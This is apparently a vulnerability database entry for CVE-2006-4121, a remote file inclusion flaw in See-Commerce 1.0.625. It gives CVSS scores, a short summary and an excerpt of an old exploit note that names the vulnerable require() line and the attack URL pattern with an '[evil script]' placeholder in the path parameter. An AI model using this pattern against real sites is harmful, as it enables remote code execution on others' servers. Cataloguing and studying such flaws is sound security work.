5.1
CVSSv2

CVE-2006-4121

Published: 14/08/2006 Updated: 19/10/2017
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in owimg.php3 in See-Commerce 1.0.625 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the path parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

see-commerce see-commerce 1.0.625

Exploits

See-Commerce Remote File Inclusion CreW: ToXiC Bug Found by Drago84 Source Code: freshmeatnet/redir/seecommerce/14016/url_zip/sc-10625zip Problem Is: require($path"/owinc"); Page Affect: [site]/[see-commerce directory]/owimgphp3?path=[evil script] Greatz : Str0ke # milw0rmcom [2006-08-09] ...